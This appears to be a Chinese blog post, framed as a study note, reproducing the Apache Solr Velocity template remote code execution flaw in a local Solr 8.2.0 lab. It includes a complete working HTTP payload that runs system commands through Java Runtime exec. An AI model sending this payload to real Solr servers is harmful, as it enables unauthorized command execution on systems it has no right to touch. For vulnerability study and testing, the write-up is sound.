博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
漏洞复现Apache Solr Velocity远程代码执行
阅读量:2061 次
发布时间:2019-04-29

本文共 1046 字,大约阅读时间需要 3 分钟。

本文为学习笔记,仅限学习交流

不得利用、从事危害国家或人民安全、荣誉和利益等活动
请参阅《中华人民共和国网络安全法》

[进攻复现] Apache Solr Velocity模板远程代码执行

*影响范围

包括但不预定8.2.0(最新版本)

*进攻威胁等级

高危

环境准备

下载漏洞环境https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip

下载命令:wget https://mirrors.tuna.tsinghua.edu.cn/apache/lucene/solr/8.2.0/solr-8.2.0.zip

在这里插入图片描述
下载完成,开始解压
命令:unzip solr-8.2.0.zip
在这里插入图片描述

解压完成,cd进入solr-8.1.0/bin目录

使用./solr -e dih -force开启漏洞环境
在这里插入图片描述
虚拟机访问:127.0.0.1:8983
成功。
尝试用PC机访问( youip:8983) 进行抓包:

显示无法访问。

可能存在防火墙设置。

停止防火墙命令:systemctl stop firewalld.service

再次尝试访问:

成功!

点击左侧的Core Selector查看集合名称

在这里插入图片描述
开启BP 抓包
在这里插入图片描述
抓包,发送至Reperter

在这里插入图片描述

使用如下payload:
爆出目录

GET /solr/db/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27ls%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1

在这里插入图片描述使用如下payload:

爆出当前用户
在这里插入图片描述

转载地址:http://ywmlf.baihongyu.com/

你可能感兴趣的文章
嵌入式 知识积累 (二) 之 三个学习阶段
查看>>
嵌入式 知识积累(三) 之 基本技能
查看>>
嵌入式 知识积累(四) 之 硬件开发的基本过程
查看>>
嵌入式 知识积累(五)之硬件工程师具备基本技能
查看>>
中小型园区网络的设计与实现 (一)
查看>>
别人的难题,就是你的价值。
查看>>
中小型园区网络的设计与实现 (二)
查看>>
中小型园区网络的设计与实现 (三)
查看>>
VLAN与子网划分区别
查看>>
Cisco Packet Tracer教程
查看>>
01. 开篇:组建小型局域网
查看>>
02. 交换机的基本配置和管理
查看>>
03. 交换机的Telnet远程登陆配置
查看>>
04. 交换机的端口聚合配置
查看>>
05. 交换机划分Vlan配置
查看>>
06. 三层交换机实现VLAN间路由
查看>>
07. 快速生成树协议
查看>>
08. 路由器的基本配置和Talent配置
查看>>
09. 路由器单臂路由配置
查看>>
10. 路由器静态路由配置
查看>>